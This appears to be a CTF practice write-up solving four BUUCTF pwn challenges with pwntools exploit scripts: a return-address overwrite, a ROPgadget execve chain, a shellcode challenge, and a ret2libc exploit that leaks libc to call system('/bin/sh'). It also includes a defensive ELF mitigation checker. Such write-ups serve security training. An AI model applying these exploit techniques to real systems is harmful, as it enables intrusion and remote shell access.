PWN-PRACTICE-BUUCTF-13
- [ZJCTF 2019]Login
- inndy_rop
- mrctf2020_shellcode
- jarvisoj_level1
[ZJCTF 2019]Login
Reference: ZJCTF 2019 Pwn
```python
from pwn import *

io = remote('node4.buuoj.cn', 27513)
# io = process("./login")

shell = 0x400e88   # return target (named `shell` in the original script)

# Python 3 / current pwntools: all payload pieces are bytes
io.recvuntil(b"username: ")
io.sendline(b"admin")
io.recvuntil(b"password: ")
# password string, 58 bytes of padding, then the saved return address
payload = b"2jctf_pa5sw0rd" + b"\x00" * 58 + p64(shell)
io.sendline(payload)
io.interactive()
```

inndy_rop
Statically linked 32-bit ELF; use ROPgadget to build a ROP chain directly.
```
ROPgadget --binary inndy_rop --ropchain
```

```python
from pwn import *
from struct import pack

# io = process('./inndy_rop')
io = remote('node4.buuoj.cn', 25930)

def ROPchain():
    # Chain emitted by ROPgadget --ropchain: store "/bin//sh\0" in .data,
    # load ebx/ecx/edx for execve, set eax = 11 and trap into the kernel.
    p = b'a' * (0xc + 4)           # padding up to the saved return address
    p += pack('<I', 0x0806ecda)    # pop edx ; ret
    p += pack('<I', 0x080ea060)    # @ .data
    p += pack('<I', 0x080b8016)    # pop eax ; ret
    p += b'/bin'
    p += pack('<I', 0x0805466b)    # mov dword ptr [edx], eax ; ret
    p += pack('<I', 0x0806ecda)    # pop edx ; ret
    p += pack('<I', 0x080ea064)    # @ .data + 4
    p += pack('<I', 0x080b8016)    # pop eax ; ret
    p += b'//sh'
    p += pack('<I', 0x0805466b)    # mov dword ptr [edx], eax ; ret
    p += pack('<I', 0x0806ecda)    # pop edx ; ret
    p += pack('<I', 0x080ea068)    # @ .data + 8
    p += pack('<I', 0x080492d3)    # xor eax, eax ; ret
    p += pack('<I', 0x0805466b)    # mov dword ptr [edx], eax ; ret  (NUL terminator)
    p += pack('<I', 0x080481c9)    # pop ebx ; ret
    p += pack('<I', 0x080ea060)    # @ .data
    p += pack('<I', 0x080de769)    # pop ecx ; ret
    p += pack('<I', 0x080ea068)    # @ .data + 8
    p += pack('<I', 0x0806ecda)    # pop edx ; ret
    p += pack('<I', 0x080ea068)    # @ .data + 8
    p += pack('<I', 0x080492d3)    # xor eax, eax ; ret
    p += pack('<I', 0x0807a66f) * 11   # inc eax ; ret, eleven times (eax = 11 = execve)
    p += pack('<I', 0x0806c943)    # int 0x80
    return p

payload = ROPchain()
io.sendline(payload)
io.interactive()
```

mrctf2020_shellcode
At offset 0x00000000000011DD there is a `call rax` gadget, and rax at that point holds the address of our input.
So for this challenge you simply send shellcode as the input; the ELF executes `call rax` and you get a shell.
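The mitigation audit a defender would run on binaries like the ones above, as an added example that is not part of the original writeup: it reads the ELF header and program headers itself and reports NX (the shellcode challenge depends on input being executable), PIE, static linking (the property that gives inndy_rop its gadget supply, versus the dynamically linked ret2libc case) and any RWX load segment. It assumes a 64-bit little-endian ELF; build_sample_elf is a helper that constructs header-only images so the check runs offline, and a missing PT_GNU_STACK entry is reported as NX off, as pwntools' checksec does.

```python
import struct

# ELF constants from elf.h
ET_EXEC, ET_DYN = 2, 3
PT_LOAD, PT_INTERP, PT_GNU_STACK = 1, 3, 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4


def elf_mitigations(data):
    """Report NX, PIE, static linking and RWX segments for a 64-bit little-endian ELF image.

    A missing PT_GNU_STACK entry is reported as NX off, as pwntools' checksec does,
    because the loader then falls back to its default stack permissions.
    """
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a 64-bit little-endian ELF")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    gnu_stack_flags, has_interp, rwx_load = None, False, False
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            gnu_stack_flags = p_flags
        elif p_type == PT_INTERP:          # PT_INTERP names ld.so: only dynamic binaries have one
            has_interp = True
        elif p_type == PT_LOAD and (p_flags & PF_W) and (p_flags & PF_X):
            rwx_load = True                # writable + executable mapping: input could run as code
    return {
        "nx": gnu_stack_flags is not None and not (gnu_stack_flags & PF_X),
        "pie": e_type == ET_DYN,
        "static": not has_interp,
        "rwx_segment": rwx_load,
    }


def build_sample_elf(e_type, phdrs):
    """Construct a header-only ELF image (no code) for offline testing; phdrs = [(p_type, p_flags), ...]."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS64, LSB, EV_CURRENT, SYSV ABI
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 0x3E, 1, 0, 64, 0, 0, 64, 56, len(phdrs), 0, 0, 0)
    phdr_table = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0) for t, f in phdrs)
    return ehdr + phdr_table


if __name__ == "__main__":
    # Constructed sample: an image shaped like the shellcode challenge (stack and data RWX, no PIE)
    weak = build_sample_elf(ET_EXEC, [(PT_INTERP, PF_R), (PT_LOAD, PF_R | PF_W | PF_X),
                                      (PT_GNU_STACK, PF_R | PF_W | PF_X)])
    print(elf_mitigations(weak))   # {'nx': False, 'pie': False, 'static': False, 'rwx_segment': True}
```

To run it on a real file, pass `open(path, "rb").read()` to `elf_mitigations`; the same parsing works on the challenge binaries once the 32-bit header layout is substituted.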
jarvisoj_level1
Stack overflow in a 32-bit ELF, solved with ret2libc.
```python
from pwn import *

# context.log_level = 'debug'
# p = process('./jarvisoj_level1')
p = remote('node4.buuoj.cn', 25340)
elf = ELF('./jarvisoj_level1')
libc = ELF('./libc-2.23-x32.so')

write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']

# Stage 1: call write(1, write_got, 4) to leak the libc address of write(), then return to main
payload1 = b'A' * 140 + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendline(payload1)
write_addr = u32(p.recv(4))
print('write addr: ' + hex(write_addr))

# Stage 2: compute the libc base and return into system("/bin/sh")
libc_base = write_addr - libc.sym['write']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))   # Python 3: next() instead of .next()
payload = b'A' * 140 + p32(system) + p32(0) + p32(binsh)
p.sendline(payload)
p.interactive()
```